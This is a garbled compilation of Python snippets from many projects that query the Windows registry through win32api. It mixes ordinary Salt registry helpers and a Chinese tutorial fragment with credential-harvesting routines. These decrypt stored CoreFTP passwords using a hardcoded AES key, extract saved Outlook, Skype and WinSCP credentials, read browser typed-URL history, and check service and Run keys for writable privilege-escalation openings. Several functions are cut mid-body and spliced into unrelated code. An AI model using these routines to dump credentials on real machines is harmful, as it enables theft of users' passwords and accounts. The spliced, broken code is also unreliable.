def __init__(self):
self.path = "WindowsRegistry"
self.map = {}
try:
import win32api
## import win32con
except ImportError:
pass
else:
HKEY_CURRENT_USER = -2147483647
HKEY_LOCAL_MACHINE = -2147483646
KEY_ALL_ACCESS = 983103
subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
for root in (HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE):
try:
hkey = win32api.RegOpenKeyEx(root, subkey, 0,
KEY_ALL_ACCESS)
except:
pass
else:
numsubkeys, numvalues, lastmodified = win32api.RegQueryInfoKey(
hkey)
for i in range(numsubkeys):
subkeyname = win32api.RegEnumKey(hkey, i)
hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0,
KEY_ALL_ACCESS)
val = win32api.RegQueryValueEx(hskey, '')
desc = getDescr(val[0])
self.map[subkeyname] = (val[0], desc)
hskey.Close()
hkey.Close()
break
def __init__(self):
self.path = "WindowsRegistry"
self.map = {}
try:
import win32api
import win32con
except ImportError:
pass
else:
subkey = r"Software\Python\PythonCore\%s\Modules" % sys.winver
for root in (win32con.HKEY_CURRENT_USER,
win32con.HKEY_LOCAL_MACHINE):
try:
#hkey = win32api.RegOpenKeyEx(root, subkey, 0, win32con.KEY_ALL_ACCESS)
hkey = win32api.RegOpenKeyEx(root, subkey, 0,
win32con.KEY_READ)
except:
pass
else:
numsubkeys, numvalues, lastmodified = win32api.RegQueryInfoKey(
hkey)
for i in range(numsubkeys):
subkeyname = win32api.RegEnumKey(hkey, i)
#hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0, win32con.KEY_ALL_ACCESS)
hskey = win32api.RegOpenKeyEx(hkey, subkeyname, 0,
win32con.KEY_READ)
val = win32api.RegQueryValueEx(hskey, '')
desc = getDescr(val[0])
#print " RegistryImportDirector got %s %s" % (val[0], desc) #XXX
self.map[subkeyname] = (val[0], desc)
hskey.Close()
hkey.Close()
break
def _GetServiceShortName(longName):
# looks up a services name
# from the display name
# Thanks to Andy McKay for this code.
access = (win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS
| win32con.KEY_QUERY_VALUE)
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services", 0,
access)
num = win32api.RegQueryInfoKey(hkey)[0]
longName = longName.lower()
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, svc, 0, access)
try:
# find display name
thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if thisName.lower() == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
class CoreFTP():
def __init__(self):
self
def get_secret(self):
return "hdfzpysvpzimorhk"
def decrypt(self, hex):
encoded = binascii.unhexlify(hex)
secret = self.get_secret()
BLOCK_SIZE = 16
mode = AES.MODE_ECB
cipher = AES.new(secret, mode)
return cipher.decrypt(encoded).split('\x00')[0]
def get_key_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,
'Software\\FTPware\\CoreFTP\\Sites', 0,
accessRead)
except Exception, e:
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'Host':
values['Host'] = k[1]
if k[0] == 'Port':
values['Port'] = k[1]
if k[0] == 'User':
values['User'] = k[1]
pwdFound.append(values)
if k[0] == 'PW':
try:
values['Password'] = self.decrypt(k[1])
except Exception, e:
values['Password'] = '******'
def list_values(hive, key=None, use_32bit_registry=False, include_default=True):
'''
Enumerates the values in a registry key or hive.
:param str hive: The name of the hive. Can be one of the following
- HKEY_LOCAL_MACHINE or HKLM
- HKEY_CURRENT_USER or HKCU
- HKEY_USER or HKU
:param str key: The key (looks like a path) to the value name. If a key is
not passed, the values under the hive will be returned.
:param bool use_32bit_registry: Accesses the 32bit portion of the registry
on 64 bit installations. On 32bit machines this is ignored.
:param bool include_default: Toggle whether to include the '(Default)' value.
:return: A list of values under the hive or key.
:rtype: list
CLI Example:
.. code-block:: bash
salt '*' reg.list_values HKLM 'SYSTEM\\CurrentControlSet\\Services\\Tcpip'
'''
local_hive = _to_unicode(hive)
local_key = _to_unicode(key)
registry = Registry()
hkey = registry.hkeys[local_hive]
access_mask = registry.registry_32[use_32bit_registry]
handle = None
values = list()
try:
handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)
for i in range(win32api.RegQueryInfoKey(handle)[1]):
vname, vdata, vtype = win32api.RegEnumValue(handle, i)
if not vname:
vname = "(Default)"
value = {'hive': local_hive,
'key': local_key,
'vname': _to_mbcs(vname),
'vdata': _to_mbcs(vdata),
'vtype': registry.vtype_reverse[vtype],
'success': True}
values.append(value)
except pywintypes.error as exc: # pylint: disable=E0602
log.debug(r'Cannot find key: %s\%s', hive, key, exc_info=True)
return False, r'Cannot find key: {0}\{1}'.format(hive, key)
finally:
if handle:
handle.Close()
return values
def get_services_from_registry(self):
service_keys = []
# Open the Base on read only
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
accessWrite = win32con.KEY_WRITE | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Services', 0,
accessRead)
num = win32api.RegQueryInfoKey(hkey)[0]
# loop through all subkeys
for x in range(0, num):
sk = Service()
# Name of the service
svc = win32api.RegEnumKey(hkey, x)
sk.name = svc
# ------ Check Write access of the key ------
try:
sk.key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s" % svc
skey = win32api.RegOpenKey(hkey, svc, 0, accessWrite)
sk.is_key_writable = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s" % svc
except win32api.error:
skey = win32api.RegOpenKey(hkey, svc, 0, accessRead)
pass
# ------ Check if the key has the Parameters\Application value presents ------
try:
# find display name
display_name = str(
win32api.RegQueryValueEx(skey, 'DisplayName')[0])
if display_name:
sk.display_name = display_name
except win32api.error:
# in case there is no key called DisplayName
pass
# ------ Check if the key has his executable with write access and the folder containing it as well ------
try:
skey = win32api.RegOpenKey(hkey, svc, 0, accessRead)
# find ImagePath name
image_path = str(
win32api.RegQueryValueEx(skey, 'ImagePath')[0])
if image_path:
image_path = os.path.expandvars(image_path)
if 'drivers' not in image_path.lower():
sk.full_path = image_path
sk.paths = get_path_info(image_path)
except win32api.error:
pass
service_keys.append(sk)
return service_keys
def getSoftwareList(self):
try:
hCounter = 0
hAttCounter = 0
# connecting to the base
hHandle = win32api.RegConnectRegistry(None,
win32con.HKEY_LOCAL_MACHINE)
# getting the machine name and domain name
hCompName = win32api.GetComputerName()
hDomainName = win32api.GetDomainName()
# opening the sub key to get the list of Softwares installed
hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,
self.CONST_SW_SUBKEY, 0,
win32con.KEY_ALL_ACCESS)
# get the total no. of sub keys
hNoOfSubNodes = win32api.RegQueryInfoKey(hHandle)
# delete the entire data and insert it again
#deleteMachineSW(hCompName,hDomainName)
# browsing each sub Key which can be Applications installed
while hCounter < hNoOfSubNodes[0]:
hAppName = win32api.RegEnumKey(hHandle, hCounter)
hPath = self.CONST_SW_SUBKEY + "\\" + hAppName
# initialising hAttCounter
hAttCounter = 0
hOpenApp = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE,
hPath, 0,
win32con.KEY_ALL_ACCESS)
# [1] will give the no. of attributes in this sub key
hKeyCount = win32api.RegQueryInfoKey(hOpenApp)
hMaxKeyCount = hKeyCount[1]
hSWName = ""
hSWVersion = ""
while hAttCounter < hMaxKeyCount:
hData = win32api.RegEnumValue(hOpenApp, hAttCounter)
if hData[0] == "DisplayName":
hSWName = hData[1]
self.preparefile("SW Name", hSWName)
elif hData[0] == "DisplayVersion":
hSWVersion = hData[1]
self.preparefile("SW Version", hSWVersion)
hAttCounter = hAttCounter + 1
#if (hSWName !=""):
#insertMachineSW(hCompName,hDomainName,hSWName,hSWVersion)
hCounter = hCounter + 1
except:
self.preparefile("Exception", "In exception in getSoftwareList")
class Outlook(ModuleInfo):
def __init__(self):
options = {
'command': '-o',
'action': 'store_true',
'dest': 'outlook',
'help': 'outlook - IMAP, POP3, HTTP, SMTP, LDPAP (not Exchange)'
}
ModuleInfo.__init__(self, 'outlook', 'mails', options)
def run(self, software_name=None):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug(
'WARNING',
'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s'
% keyPath)
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
return pwdFound
def _getLocation():
''' Looks through the registry to find the current users Cookie folder. This is the folder IE uses. '''
key = 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders'
regkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, key, 0, win32con.KEY_ALL_ACCESS)
num = win32api.RegQueryInfoKey(regkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(regkey, x)
if k[0] == 'Cookies':
return k[1]
def store_certificates(path, hKey=win32con.HKEY_CURRENT_USER):
hKey = hkey2handle(hKey)
k = win32api.RegOpenKey(hKey, path)
nsubkeys, nvalues, nanos = win32api.RegQueryInfoKey(k)
subkeys = [win32api.RegEnumKey(k, i) for i in range(nsubkeys)]
certificates = dict(
(name, store_certficate_value(k, name)) for name in subkeys)
win32api.RegCloseKey(k)
return certificates
def list_keys(hive, key=None, use_32bit_registry=False):
'''
Enumerates the subkeys in a registry key or hive.
:param str hive: The name of the hive. Can be one of the following
- HKEY_LOCAL_MACHINE or HKLM
- HKEY_CURRENT_USER or HKCU
- HKEY_USER or HKU
- HKEY_CLASSES_ROOT or HKCR
- HKEY_CURRENT_CONFIG or HKCC
:param str key: The key (looks like a path) to the value name. If a key is
not passed, the keys under the hive will be returned.
:param bool use_32bit_registry: Accesses the 32bit portion of the registry
on 64 bit installations. On 32bit machines this is ignored.
:return: A list of keys/subkeys under the hive or key.
:rtype: list
CLI Example:
.. code-block:: bash
salt '*' reg.list_keys HKLM 'SOFTWARE'
'''
local_hive = _to_unicode(hive)
local_key = _to_unicode(key)
registry = Registry()
try:
hkey = registry.hkeys[local_hive]
except KeyError:
raise CommandExecutionError('Invalid Hive: {0}'.format(local_hive))
access_mask = registry.registry_32[use_32bit_registry]
subkeys = []
try:
handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)
for i in range(win32api.RegQueryInfoKey(handle)[0]):
subkey = win32api.RegEnumKey(handle, i)
if PY2:
subkeys.append(_to_mbcs(subkey))
else:
subkeys.append(subkey)
handle.Close()
except Exception: # pylint: disable=E0602
log.debug(r'Cannot find key: %s\%s', hive, key, exc_info=True)
return False, r'Cannot find key: {0}\{1}'.format(hive, key)
return subkeys
def get_values(self):
try:
values = []
(subkey_count, value_count, mod_time) = win32api.RegQueryInfoKey(self.get_keyh())
for i in range(0, value_count):
(s, o, t) = win32api.RegEnumValue(self.get_keyh(), i)
values.append(s)
return values
except:
return []
def _getLocation():
""" Examines the registry to find the cookie folder IE uses """
key = r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders'
regkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, key, 0,
win32con.KEY_ALL_ACCESS)
num = win32api.RegQueryInfoKey(regkey)[1]
for x in range(num):
k = win32api.RegEnumValue(regkey, x)
if k[0] == 'Cookies':
return k[1]
class Outlook():
def __init__(self):
options = {
'command': '-o',
'action': 'store_true',
'dest': 'outlook',
'help': 'outlook - IMAP, POP3, HTTP, SMTP, LDPAP (not Exchange)'
}
def run(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except Exception, e:
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
return pwdFound
def _search_guts(results, hKey, path, parent=''):
k = win32api.RegOpenKey(hKey, path)
try:
nsubkeys, nvalues, nanos = win32api.RegQueryInfoKey(k)
for i in range(nsubkeys):
subkey = win32api.RegEnumKey(k, i)
if _is_thumbprint(subkey):
results.append(parent + subkey)
else:
_search_guts(results, k, subkey, parent=parent + path + '\\')
finally:
win32api.RegCloseKey(k)
def retrieve_password(self):
# print title
Header().title_debug('Outlook')
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except:
print_debug(
'ERROR',
'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s'
% keyPath)
return
num = win32api.RegQueryInfoKey(hkey)[0]
pwdFound = []
for x in range(0, num):
name = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
num_skey = win32api.RegQueryInfoKey(skey)[0]
if num_skey != 0:
for y in range(0, num_skey):
name_skey = win32api.RegEnumKey(skey, y)
sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
num_sskey = win32api.RegQueryInfoKey(sskey)[1]
for z in range(0, num_sskey):
k = win32api.RegEnumValue(sskey, z)
if 'password' in k[0].lower():
values = self.retrieve_info(sskey, name_skey)
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output("Outlook", pwdFound)
def enum_values(self):
sub_key_count, value_count, mod_time = win32api.RegQueryInfoKey(
self.key_handle
)
values = {}
for value_index in range(value_count):
value_name, value_object, value_type = win32api.RegEnumValue(
self.key_handle,
value_index
)
value_hash = hashlib.md5(value_object).hexdigest()
values[value_name] = value_hash
return ValueCache(values)
def retrieve_info(self, hkey, name_key):
values = {}
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if 'password' in k[0].lower():
try:
password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
values[k[0]] = password.decode('utf16')
except Exception, e:
values[k[0]] = 'N/A'
else:
try:
values[k[0]] = str(k[1]).decode('utf16')
except:
values[k[0]] = str(k[1])
def get_sensitive_registry_key(self):
keys = []
runkeys_hklm = self.definePath()
# access either in read only mode, or in write mode
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
accessWrite = win32con.KEY_WRITE | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
# Loop through all keys to check
for keyPath in runkeys_hklm:
is_key_writable = False
# check if the registry key has writable access
try:
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
keyPath, 0, accessWrite)
is_key_writable = keyPath
except:
try:
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
keyPath, 0, accessRead)
except:
continue
# retrieve all value of the registry key
try:
num = win32api.RegQueryInfoKey(hkey)[1]
# loop through number of value in the key
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
stk = Registry_key()
if is_key_writable:
stk.is_key_writable = is_key_writable
stk.key = keyPath
stk.name = k[0]
stk.full_path = k[1]
stk.paths = get_path_info(k[1])
keys.append(stk)
win32api.RegCloseKey(hkey)
except win32api.error:
pass
return keys
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception, e:
print e
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def history_from_regedit(self):
urls = []
# open the registry
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except:
return []
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if k:
urls.append(k[1])
return urls
def retrieve_softwares(self):
results = []
# Open the Base on read only
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
# check the uninstall key path
hkey = win32api.RegOpenKey(
win32con.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\\", 0,
accessRead)
num = win32api.RegQueryInfoKey(hkey)[0]
# loop through number of subkeys
for x in range(0, num):
# Name of the software key
sk = win32api.RegEnumKey(hkey, x)
# ------ Check if the key has his executable with write access and the folder containing it as well ------
try:
skey = win32api.RegOpenKey(hkey, sk, 0, accessRead)
name = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if name:
# regex to not match security patch (KB)
m = re.match(r".*KB[0-9]{5,7}.*", name, re.IGNORECASE)
if not m:
soft = Software()
soft.name = name
soft.version = str(
win32api.RegQueryValueEx(skey,
"DisplayVersion")[0])
soft.key = skey
results.append(soft)
except:
pass
return results
def GetShortName(longName):
import win32con
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services", 0,
win32con.KEY_ALL_ACCESS)
num = win32api.RegQueryInfoKey(hkey)[0]
svc = None
for x in range(0, num):
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(
win32con.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\%s" % svc, 0,
win32con.KEY_ALL_ACCESS)
try:
shortName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if shortName == longName:
break
except win32api.error:
svc = None
return svc
def GetShortName(longName):
# looks up a services name
# from the display name
hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services", 0,
win32con.KEY_ALL_ACCESS)
num = win32api.RegQueryInfoKey(hkey)[0]
# loop through number of subkeys
for x in range(0, num):
# find service name, open subkey
svc = win32api.RegEnumKey(hkey, x)
skey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, \
"SYSTEM\\CurrentControlSet\\Services\\%s" % svc, 0, win32con.KEY_ALL_ACCESS)
try:
# find short name
shortName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
if shortName == longName:
return svc
except win32api.error:
# in case there is no key called DisplayName
pass
return None
win32api.RegQueryInfoKey(key) # RegQueryInfoKey函数查询项的基本信息; 返回项的子项数目、项值数目,以及最后一次修改时间
如:
import win32api
import win32con
# 打开“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer”项
key = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Internet Explorer',0, win32con.KEY_ALL_ACCESS)
# 读取项的默认值''
# 输出为空,表示其默认值未设置
print win32api.RegQueryValue(key,'')
#读取项值名称为Version的项值数据,也就是Internet Explorer的版本
print win32api.RegQueryValueEx(key,'Version') # 显示如:('6.0.2900.2180', 1)
print win32api.RegQueryInfoKey(key) # 查询项的基本信息,显示如:(26, 7, 128178812229687500L)
6. 设置项值
win32api.RegSetValue(key,subKey,type,value) # 设置项的默认值
Key:已经打开的项的句柄。
subKey:所要设置的子项。
Type:项值的类型,必须为 win32con.REG_SZ。
Value:项值数据,为字符串。
win32api.RegSetValueEx(key,valueName,reserved,type,value) # 要修改或重新设置注册表某一项的项值。如果项值存在,则修改该项值,如果不存在,则添加该项值。
Key:要设置的项的句柄。
valueName:要设置的项值名称。
Reserved:保留,可以设为0。
Type:项值的类型。
Value:所要设置的值。
def list_values(hive, key=None, use_32bit_registry=False):
"""
Enumerates the values in a registry key or hive.
.. note::
The ``(Default)`` value will only be returned if it is set, otherwise it
will not be returned in the list of values.
Args:
hive (str):
The name of the hive. Can be one of the following:
- HKEY_LOCAL_MACHINE or HKLM
- HKEY_CURRENT_USER or HKCU
- HKEY_USER or HKU
- HKEY_CLASSES_ROOT or HKCR
- HKEY_CURRENT_CONFIG or HKCC
key (str):
The key (looks like a path) to the value name. If a key is not
passed, the values under the hive will be returned.
use_32bit_registry (bool):
Accesses the 32bit portion of the registry on 64 bit installations.
On 32bit machines this is ignored.
Returns:
list: A list of values under the hive or key.
Usage:
.. code-block:: python
import salt.utils.win_reg
winreg.list_values(hive='HKLM', key='SYSTEM\\CurrentControlSet\\Services\\Tcpip')
"""
local_hive = _to_unicode(hive)
local_key = _to_unicode(key)
registry = Registry()
try:
hkey = registry.hkeys[local_hive]
except KeyError:
raise CommandExecutionError("Invalid Hive: {}".format(local_hive))
access_mask = registry.registry_32[use_32bit_registry]
handle = None
values = list()
try:
handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)
for i in range(win32api.RegQueryInfoKey(handle)[1]):
vname, vdata, vtype = win32api.RegEnumValue(handle, i)
if not vname:
vname = "(Default)"
value = {
"hive": local_hive,
"key": local_key,
"vname": _to_mbcs(vname),
"vtype": registry.vtype_reverse[vtype],
"success": True,
}
# Only convert text types to unicode
if vtype == win32con.REG_MULTI_SZ:
value["vdata"] = [_to_mbcs(i) for i in vdata]
elif vtype in [win32con.REG_SZ, win32con.REG_EXPAND_SZ]:
value["vdata"] = _to_mbcs(vdata)
else:
value["vdata"] = vdata
values.append(value)
except win32api.error as exc:
if exc.winerror == 2:
log.debug(r"Cannot find key: %s\%s", hive, key)
return False, r"Cannot find key: {}\{}".format(hive, key)
raise
finally:
if handle:
handle.Close()
return values
def list_keys(hive, key=None, use_32bit_registry=False):
"""
Enumerates the subkeys in a registry key or hive.
Args:
hive (str):
The name of the hive. Can be one of the following:
- HKEY_LOCAL_MACHINE or HKLM
- HKEY_CURRENT_USER or HKCU
- HKEY_USERS or HKU
- HKEY_CLASSES_ROOT or HKCR
- HKEY_CURRENT_CONFIG or HKCC
key (str):
The key (looks like a path) to the value name. If a key is not
passed, the keys under the hive will be returned.
use_32bit_registry (bool):
Accesses the 32bit portion of the registry on 64 bit installations.
On 32bit machines this is ignored.
Returns:
list: A list of keys/subkeys under the hive or key.
Usage:
.. code-block:: python
import salt.utils.win_reg
winreg.list_keys(hive='HKLM', key='SOFTWARE\\Microsoft')
"""
local_hive = _to_unicode(hive)
local_key = _to_unicode(key)
registry = Registry()
try:
hkey = registry.hkeys[local_hive]
except KeyError:
raise CommandExecutionError("Invalid Hive: {}".format(local_hive))
access_mask = registry.registry_32[use_32bit_registry]
subkeys = []
handle = None
try:
handle = win32api.RegOpenKeyEx(hkey, local_key, 0, access_mask)
for i in range(win32api.RegQueryInfoKey(handle)[0]):
subkey = win32api.RegEnumKey(handle, i)
if PY2:
subkeys.append(_to_mbcs(subkey))
else:
subkeys.append(subkey)
except win32api.error as exc:
if exc.winerror == 2:
log.debug(r"Cannot find key: %s\%s", hive, key, exc_info=True)
return False, r"Cannot find key: {}\{}".format(hive, key)
raise
finally:
if handle:
handle.Close()
return subkeys
def history_from_regedit(self):
urls = []
# open the registry
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0,
accessRead)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
return []
num = win32api.RegQueryInfoKey(hkey)[1]
for x in range(0, num):
k = win32api.RegEnumValue(hkey, x)
if k:
urls.append(k[1])
return urls
def decipher_password(self, cipher_text, u):
pfound = []
# deciper the password
pwd = self.Win32CryptUnprotectData(cipher_text, u)
a = None
for i in range(len(pwd)):
try:
a = pwd[i:].decode('UTF-16LE')
a = a.decode('utf-8')
if thisName == '0':
return False
else:
return True
def get_logins_info(self):
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
try:
key = win32api.RegOpenKey(
win32con.HKEY_CURRENT_USER,
'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
return False
num_profiles = win32api.RegQueryInfoKey(key)[0]
pwdFound = []
for n in range(num_profiles):
name_skey = win32api.RegEnumKey(key, n)
skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
num = win32api.RegQueryInfoKey(skey)[1]
port = ''
values = {}
for nn in range(num):
k = win32api.RegEnumValue(skey, nn)
if k[0] == 'HostName':
for x in win32process.EnumProcessModules(h)
]:
if 'delphi32.exe' in mod:
return True
return False
# clean up old restart records
key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, "Software")
key = win32api.RegOpenKey(key, "Jabber")
key = win32api.RegOpenKey(key, "Exodus")
try:
restart = win32api.RegOpenKey(key, "Restart")
keys = []
for i in range(0, win32api.RegQueryInfoKey(restart)[0]):
keys.append(win32api.RegEnumKey(restart, i))
for subkey in keys:
win32api.RegDeleteKey(restart, subkey)
win32api.RegCloseKey(restart)
win32api.RegDeleteKey(key, "Restart")
except:
pass
count = 0
while True:
if count > 10:
print "Could not shut down an Exodus instance"
sys.exit(1)
wins = []